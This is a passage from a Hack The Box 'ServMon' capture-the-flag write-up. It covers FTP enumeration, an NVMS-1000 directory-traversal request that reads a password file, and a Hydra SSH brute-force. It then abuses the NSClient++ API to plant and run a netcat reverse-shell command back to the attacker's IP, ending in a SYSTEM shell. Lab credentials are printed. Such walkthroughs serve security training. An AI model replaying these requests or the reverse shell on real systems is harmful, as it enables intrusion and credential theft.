<p>so inside of <code>nadine</code> directory there a <code>confidential.txt</code> file’ next, check Nathan directory :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">ftp&gt; <span class="built_in">cd</span> ..</span><br><span class="line">250 CWD <span class="built_in">command</span> successful.</span><br><span class="line">ftp&gt; <span class="built_in">cd</span> Nathan</span><br><span class="line">250 CWD <span class="built_in">command</span> successful.</span><br><span class="line">ftp&gt; dir</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">01-18-20  12:10PM                  186 Notes to do.txt</span><br><span class="line">226 Transfer complete.</span><br><span class="line">ftp&gt; get <span class="string">"Notes to do.txt"</span></span><br><span class="line"><span class="built_in">local</span>: Notes to do.txt remote: Notes to do.txt</span><br><span class="line">200 PORT <span class="built_in">command</span> successful.</span><br><span class="line">125 Data connection already open; Transfer starting.</span><br><span class="line">226 Transfer complete.</span><br><span class="line">186 bytes received <span class="keyword">in</span> 0.25 secs (0.7285 kB/s)</span><br><span class="line">ftp&gt;</span><br></pre></td></tr></table></figure>

<p>There is <code>Notes to do.txt</code> so it is task for our user.</p>
<p>Next’ read the <code>.txt</code> file of two users</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ ls</span><br><span class="line"> Confidential.txt   nmap-ServMon  <span class="string">'Notes to do.txt'</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ cat Confidential.txt </span><br><span class="line">Nathan,</span><br><span class="line"></span><br><span class="line">I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.</span><br><span class="line"></span><br><span class="line">Regards</span><br><span class="line"></span><br><span class="line">Nadine</span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>so I get a hint from <code>nadine</code> txt file. It seems that the <code>admin</code> put her password in her desktop.</p>
<p>Next the task of <code>nathan</code> :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ cat <span class="string">'Notes to do.txt'</span> </span><br><span class="line">1) Change the password <span class="keyword">for</span> NVMS - Complete</span><br><span class="line">2) Lock down the NSClient Access - Complete</span><br><span class="line">3) Upload the passwords</span><br><span class="line">4) Remove public access to NVMS</span><br><span class="line">5) Place the secret files <span class="keyword">in</span> SharePoint</span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>So another hint I got. the 1 &amp; 2 task are completed but the remaining 3 are not.</p>
<p>Let’s start digging more :</p>
<hr>
<h2 id="Post-Exploitation"><a href="#Post-Exploitation" class="headerlink" title="Post Exploitation"></a>Post Exploitation</h2><h3 id="Checking-the-Web-client"><a href="#Checking-the-Web-client" class="headerlink" title="Checking the Web client"></a>Checking the Web client</h3><p>I visit on the web page of the box. In <code>nathan</code> notes they mentioned the <code>NVMS</code>, and this seems has version – <code>NVMS - 1000</code>.<br>I search it on google and it is vulnerable to <code>directory - traversal</code> :</p>
<p><img src="/img/servmon/nvms-1000-exploit.png" alt="HackTheBox-ServMon" title="NVMS - 1000"></p>
<p>The step by step on <code>Exploit DB</code></p>
<a href="https://www.exploit-db.com/exploits/47774" class="link-preview" target="rel"><div class="link-area"><div class="og-image"><img src="https://www.exploit-db.com/images/spider-orange.png"></img></div><div class="descriptions"><div class="og-title">Offensive Security’s Exploit Database Archive</div><div class="og-description">NVMS 1000 - Directory Traversal.. webapps exploit for Hardwa…</div></div></div></a>


<p>The <code>NVMS</code> login page :</p>
<p><img src="/img/servmon/servmon-nvms-1000.png" alt="HackTheBox-ServMon" title="NVMS - 1000"></p>
<h3 id="Directory-Traversal"><a href="#Directory-Traversal" class="headerlink" title="Directory Traversal"></a>Directory Traversal</h3><p>In this phase i will try <code>nvms-1000</code> exploit’ with <code>Burp Suite</code> :</p>
<p><img src="/img/servmon/servmon-burp.png" alt="HackTheBox-ServMon" title="NVMS - 1000"></p>
<p>Directory traversal confirmed ! Now’ let’s try look at <code>nadine</code> desktop it’s mentioned on the note that her password is there :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">GET /../../../../../../../../../../../../Users/Nadine/Desktop/Passwords.txt HTTP/1.1</span><br><span class="line">Host: 10.10.10.184</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: dataPort=6063</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>

<p>but I got a <code>404</code> status :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">HTTP/1.1 404 Not Found</span><br><span class="line">Content-type: text/html</span><br><span class="line">Content-Length: 0</span><br><span class="line">Connection: close</span><br><span class="line">AuthInfo:</span><br></pre></td></tr></table></figure>

<p>I think password of <code>nadine</code> doesn’t exist so I tried to user <code>nathan</code> if i can get any :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1</span><br><span class="line">Host: 10.10.10.184</span><br><span class="line">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: dataPort=6063</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>

<p>after I send that request I got a list of passwords :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Content-type: text/plain</span><br><span class="line">Content-Length: 156</span><br><span class="line">Connection: close</span><br><span class="line">AuthInfo: </span><br><span class="line"></span><br><span class="line">1nsp3ctTh3Way2Mars!</span><br><span class="line">Th3r34r3To0M4nyTrait0r5!</span><br><span class="line">B3WithM30r4ga1n5tMe</span><br><span class="line">L1k3B1gBut7s@W0rk</span><br><span class="line">0nly7h3y0unGWi11F0l10w</span><br><span class="line">IfH3s4b0Utg0t0H1sH0me</span><br><span class="line">Gr4etN3w5w17hMySk1Pa5$</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Brute-forcing-the-SSH"><a href="#Brute-forcing-the-SSH" class="headerlink" title="Brute forcing the SSH"></a>Brute forcing the SSH</h3><p>I saved all the <code>passwords</code> in a txt file then I create another txt file which contains 2 users – <code>nadine</code> &amp; <code>nathan</code></p>
<p>I use <code>hydra</code> to brute force the <code>SSH</code> service and finally I got the right credentials .</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon took 1m15s </span><br><span class="line">❯ hydra -L users -P passwords 10.10.10.184 ssh</span><br><span class="line">Hydra v9.0 (c) 2019 by van Hauser/THC - Please <span class="keyword">do</span> not use <span class="keyword">in</span> military or secret service organizations, or <span class="keyword">for</span> illegal purposes.</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-14 08:45:38</span><br><span class="line">[WARNING] Many SSH configurations <span class="built_in">limit</span> the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br><span class="line">[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task</span><br><span class="line">[DATA] attacking ssh://10.10.10.184:22/</span><br><span class="line">[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-14 08:45:58</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon took 24s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<h3 id="Get-user-txt"><a href="#Get-user-txt" class="headerlink" title="Get user.txt"></a>Get user.txt</h3><p>after I found the right creds. I finally get in to the machine and grab the <code>user.txt</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ ssh nadine@<span class="number">10.10</span><span class="number">.10</span><span class="number">.184</span></span><br><span class="line">nadine@<span class="number">10.10</span><span class="number">.10</span><span class="number">.184'</span>s password: </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Microsoft Windows [Version <span class="number">10.0</span><span class="number">.18363</span><span class="number">.752</span>]</span><br><span class="line">(c) <span class="number">2019</span> Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine&gt;dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">728</span>C-D22C</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Nadine</span><br><span class="line"></span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">23</span>:<span class="number">16</span>    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">23</span>:<span class="number">16</span>    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          <span class="number">3</span>D Objects</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Contacts</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">28</span>    &lt;DIR&gt;          Desktop</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">28</span>    &lt;DIR&gt;          Documents</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Downloads</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">27</span>    &lt;DIR&gt;          Favorites</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">27</span>    &lt;DIR&gt;          Links</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Music</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">31</span>    &lt;DIR&gt;          OneDrive</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Pictures</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Saved Games</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Searches</span><br><span class="line"><span class="number">18</span>/<span class="number">01</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">23</span>    &lt;DIR&gt;          Videos</span><br><span class="line">               <span class="number">0</span> File(s)              <span class="number">0</span> bytes</span><br><span class="line">              <span class="number">15</span> Dir(s)  <span class="number">27</span>,<span class="number">382</span>,<span class="number">452</span>,<span class="number">224</span> bytes free</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine&gt;cd Desktop</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine\Desktop&gt;dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">728</span>C-D22C</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Nadine\Desktop</span><br><span class="line"></span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">28</span>    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">22</span>:<span class="number">28</span>    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">14</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">01</span>:<span class="number">20</span>                <span class="number">34</span> user.txt</span><br><span class="line">               <span class="number">1</span> File(s)             <span class="number">34</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)  <span class="number">27</span>,<span class="number">382</span>,<span class="number">452</span>,<span class="number">224</span> bytes free</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine\Desktop&gt;more user.txt</span><br><span class="line">[<span class="meta">-----</span>]bb8f5da6[-------------------]</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine\Desktop&gt;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><h3 id="Enumerating-directories"><a href="#Enumerating-directories" class="headerlink" title="Enumerating directories"></a>Enumerating directories</h3><p>at first I started to enumerate the machine directories and I found inside on ‘Program Files’ directories what’s is mentioned in <code>nathan&#39;s</code> note which is the <code>NSClient++</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine\Desktop&gt;cd /</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\&gt;dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">728</span>C-D22C</span><br><span class="line"></span><br><span class="line"> Directory of C:\</span><br><span class="line"></span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">23</span>:<span class="number">21</span>    &lt;DIR&gt;          inetpub</span><br><span class="line"><span class="number">19</span>/<span class="number">03</span>/<span class="number">2019</span>  <span class="number">05</span>:<span class="number">52</span>    &lt;DIR&gt;          PerfLogs</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">23</span>:<span class="number">21</span>    &lt;DIR&gt;          Program Files</span><br><span class="line"><span class="number">08</span>/<span class="number">04</span>/<span class="number">2020</span>  <span class="number">23</span>:<span class="number">21</span>    &lt;DIR&gt;          <span class="function">Program <span class="title">Files</span> (<span class="params">x86</span>)</span></span><br><span class="line"><span class="function">18/01/2020  11:00    &lt;DIR&gt;          RecData</span></span><br><span class="line"><span class="function">18/01/2020  12:31    &lt;DIR&gt;          Shared</span></span><br><span class="line"><span class="function">14/04/2020  01:38    &lt;DIR&gt;          Temp</span></span><br><span class="line"><span class="function">08/04/2020  22:26    &lt;DIR&gt;          Users</span></span><br><span class="line"><span class="function">09/04/2020  09:38    &lt;DIR&gt;          Windows</span></span><br><span class="line"><span class="function">               0 <span class="title">File</span>(<span class="params">s</span>)              0 bytes</span></span><br><span class="line"><span class="function">               9 <span class="title">Dir</span>(<span class="params">s</span>)  27,379,249,152 bytes free</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">nadine@SERVMON C:\&gt;cd 'Program Files'</span></span><br><span class="line"><span class="function">The system cannot find the path specified.</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">nadine@SERVMON C:\&gt;cd "Program Files"</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">nadine@SERVMON C:\Program Files&gt;dir</span></span><br><span class="line"><span class="function"> Volume <span class="keyword">in</span> drive C has no label.</span></span><br><span class="line"><span class="function"> Volume Serial Number <span class="keyword">is</span> 728C-D22C</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"> Directory of C:\Program Files</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">08/04/2020  23:21    &lt;DIR&gt;          .</span></span><br><span class="line"><span class="function">08/04/2020  23:21    &lt;DIR&gt;          ..</span></span><br><span class="line"><span class="function">08/04/2020  23:21    &lt;DIR&gt;          Common Files</span></span><br><span class="line"><span class="function">08/04/2020  23:18    &lt;DIR&gt;          Internet Explorer</span></span><br><span class="line"><span class="function">19/03/2019  05:52    &lt;DIR&gt;          ModifiableWindowsApps</span></span><br><span class="line"><span class="function">16/01/2020  19:11    &lt;DIR&gt;          NSClient++ <span class="comment">// &lt;-- our target</span></span></span><br><span class="line"><span class="function">08/04/2020  23:09    &lt;DIR&gt;          Reference Assemblies</span></span><br><span class="line"><span class="function">08/04/2020  23:21    &lt;DIR&gt;          UNP</span></span><br><span class="line"><span class="function">14/01/2020  09:14    &lt;DIR&gt;          VMware</span></span><br><span class="line"><span class="function">08/04/2020  22:31    &lt;DIR&gt;          Windows Defender</span></span><br><span class="line"><span class="function">08/04/2020  22:45    &lt;DIR&gt;          Windows Defender Advanced Threat Protection</span></span><br><span class="line"><span class="function">19/03/2019  05:52    &lt;DIR&gt;          Windows Mail</span></span><br><span class="line"><span class="function">19/03/2019  12:43    &lt;DIR&gt;          Windows Multimedia Platform</span></span><br><span class="line"><span class="function">19/03/2019  06:02    &lt;DIR&gt;          Windows NT</span></span><br><span class="line"><span class="function">19/03/2019  12:43    &lt;DIR&gt;          Windows Photo Viewer</span></span><br><span class="line"><span class="function">19/03/2019  12:43    &lt;DIR&gt;          Windows Portable Devices</span></span><br><span class="line"><span class="function">19/03/2019  05:52    &lt;DIR&gt;          Windows Security</span></span><br><span class="line"><span class="function">19/03/2019  05:52    &lt;DIR&gt;          WindowsPowerShell</span></span><br><span class="line"><span class="function">               0 <span class="title">File</span>(<span class="params">s</span>)              0 bytes</span></span><br><span class="line"><span class="function">              18 <span class="title">Dir</span>(<span class="params">s</span>)  27,379,228,672 bytes free</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">nadine@SERVMON C:\Program Files&gt;</span></span><br></pre></td></tr></table></figure>

<p>I search this on google and I found <a href="https://www.exploit-db.com/exploits/46802" target="_blank" rel="noopener">this</a> step by step privilege escalation.</p>
<p>Base on the exploit, When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator’s password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.</p>
<h3 id="Grab-administrator-password"><a href="#Grab-administrator-password" class="headerlink" title="Grab administrator password"></a>Grab administrator password</h3><p>I open the <code>NSClient++</code> directories and try to display the admin password :</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">Microsoft Windows [Version <span class="number">10.0</span><span class="number">.18363</span><span class="number">.752</span>]</span><br><span class="line">(c) <span class="number">2019</span> Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine&gt;cd \<span class="string">"Program Files"</span></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Program Files&gt;cd NSClient++</span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Program Files\NSClient++&gt;nscp web -- password --display</span><br><span class="line">Current password: ew2x6SsGTxjRwXOT <span class="comment">// &lt;-- admin password</span></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Program Files\NSClient++&gt;</span><br></pre></td></tr></table></figure>

<p>Got it ! Now let’s check on what port is running <code>NSClient++</code> Web Server</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Program Files&gt;netstat -ano</span><br><span class="line"></span><br><span class="line">Active Connections</span><br><span class="line"></span><br><span class="line">  Proto  Local Address          Foreign Address        State           PID</span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">21</span>             <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">2472</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">22</span>             <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">2696</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">80</span>             <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">8064</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">135</span>            <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">884</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">445</span>            <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">4</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">5040</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">3924</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">5666</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">1832</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">5666</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">1832</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">6063</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">8064</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">6699</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">8064</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">7680</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">7344</span></span><br><span class="line">  TCP    <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">8443</span>           <span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">0</span>              LISTENING       <span class="number">1832</span></span><br></pre></td></tr></table></figure>

<p>The <code>NSClient++</code> is running on port <code>8443</code> it is also appear on my nmap scan on recon phase.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">8443/tcp open  tcpwrapped</span><br><span class="line">| http-title: NSClient++</span><br><span class="line">|_Requested resource was /index.html</span><br><span class="line">| ssl-cert: Subject: commonName=localhost</span><br><span class="line">| Not valid before: 2020-01-14T13:24:20</span><br><span class="line">|_Not valid after:  2021-01-13T13:24:20</span><br><span class="line">|_ssl-date: TLS randomness does not represent time</span><br></pre></td></tr></table></figure>

<p>To work on this I need to use <code>port forwarding</code> and visit the NSClient web page.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184</span><br><span class="line"></span><br><span class="line">Microsoft Windows [Version 10.0.18363.752]</span><br><span class="line">(c) 2019 Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">nadine@SERVMON C:\Users\Nadine&gt;</span><br></pre></td></tr></table></figure>

<h3 id="NSClient-Web-Server"><a href="#NSClient-Web-Server" class="headerlink" title="NSClient++ Web Server"></a>NSClient++ Web Server</h3><p>I found some difficulty to access the web server it is so slow to respond and load due to high network traffic but I can use <code>cURL</code> to send a request.</p>
<p>Steps to get reverse shell :</p>
<p>I will try to transfer my <code>nc.exe</code> using <code>SMB Server</code> and try to put <code>nc.exe</code> inside so :</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/payas0.bat --data-binary <span class="string">"C:\Temp\nc.exe 10.10.15.151 9001 -e cmd.exe"</span></span><br><span class="line">Enter host password <span class="keyword">for</span> user <span class="string">'admin'</span>:</span><br><span class="line"></span><br><span class="line">Added payas0 as scripts\payas0.bat</span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon took 12s </span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>I got the message that my script is added. Next i will setup my <code>netcat</code> and execute the binary using this request .</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># bash</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ curl -s -k -u admin https://localhost:8443/api/v1/queries/payas0/commands/execute?time=1m</span><br><span class="line">Enter host password <span class="keyword">for</span> user <span class="string">'admin'</span>:</span><br></pre></td></tr></table></figure>

<p>after 1 minutes I successfully got admin shell :</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/ServMon </span><br><span class="line">❯ nc -nvlp <span class="number">9001</span></span><br><span class="line">listening <span class="keyword">on</span> [any] <span class="number">9001</span> ...</span><br><span class="line">connect to [<span class="number">10.10</span><span class="number">.15</span><span class="number">.151</span>] <span class="keyword">from</span> (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.184</span>] <span class="number">52839</span></span><br><span class="line">Windows PowerShell</span><br><span class="line">Copyright (C) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">Try the <span class="keyword">new</span> cross-platform PowerShell https:<span class="comment">//aka.ms/pscore6</span></span><br><span class="line"></span><br><span class="line">PS C:\Program Files\NSClient++&gt;</span><br></pre></td></tr></table></figure>

<p>Finally I’ve got the <code>root</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">PS C:\Program Files\NSClient++&gt; whoami</span><br><span class="line">whoami</span><br><span class="line">nt authority\system</span><br><span class="line">PS C:\Program Files\NSClient++&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Grab-root-flag"><a href="#Grab-root-flag" class="headerlink" title="Grab root flag"></a>Grab root flag</h3><p>After getting the admin I can grab now the <code>root.txt</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># bash</span></span><br><span class="line"></span><br><span class="line">PS C:\users\Administrator\Desktop&gt; cat root.txt</span><br><span class="line">cat root.txt</span><br><span class="line"><span class="number">64e1</span>-------------------------f274</span><br><span class="line">PS C:\users\Administrator\Desktop&gt;</span><br></pre></td></tr></table></figure>

<hr>
<p>If you liked my writeup please leave a respect on my <a href="https://www.hackthebox.eu/profile/128965" target="_blank" rel="noopener">Profile</a></p>
<p><img src="https://www.hackthebox.eu/badge/image/128965" alt="Payas0" title="Payas0"></p>
<hr>
<p>Referrences:</p>
<p><a href="https://www.exploit-db.com/exploits/48311" target="_blank" rel="noopener">NVMS-1000 Exploit</a></p>
<p><a href="https://www.exploit-db.com/exploits/46802" target="_blank" rel="noopener">NSClient++ - Privilege Escalation</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Posts</a></li>
         
          <li><a href="/projects/">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
